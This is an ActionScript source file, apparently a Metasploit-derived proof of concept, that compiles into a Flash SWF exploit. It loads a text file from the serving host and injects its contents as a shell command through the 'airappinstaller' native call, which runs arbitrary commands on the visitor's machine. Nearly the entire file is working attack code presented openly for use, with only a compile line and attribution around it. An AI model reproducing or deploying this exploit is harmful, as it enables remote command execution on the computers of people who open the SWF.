48 lines
1.2 KiB
ActionScript
48 lines
1.2 KiB
ActionScript
/*
|
|
Compile: mtasc -version 8 -swf Exploit.swf -main -header 800:600:20 Exploit.as
|
|
Author: 0a29406d9794e4f9b30b3c5d6702c708 / Unknown / metasploit
|
|
PoC: http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as
|
|
*/
|
|
|
|
import flash.external.ExternalInterface;
|
|
|
|
class Exploit {
|
|
|
|
public function randname(newLength:Number):String{
|
|
var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
|
|
var alphabet:Array = a.split("");
|
|
var randomLetter:String = "";
|
|
|
|
for (var i:Number = 0; i < newLength; i++){
|
|
randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
|
|
}
|
|
|
|
return randomLetter;
|
|
}
|
|
|
|
public function exploit() {
|
|
var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";
|
|
var loadVars:LoadVars = new LoadVars();
|
|
|
|
loadVars.onData = function(str:String):Void {
|
|
if (str) {
|
|
if (_global.ASnative(2201, 1)("airappinstaller")) {
|
|
_global.ASnative(2201, 2)("airappinstaller", "; " + str);
|
|
}
|
|
} else {
|
|
// FAIL
|
|
}
|
|
}
|
|
loadVars.load(path);
|
|
}
|
|
|
|
public function Exploit() {
|
|
exploit();
|
|
}
|
|
|
|
static function main() {
|
|
var ex : Exploit;
|
|
ex = new Exploit();
|
|
}
|
|
}
|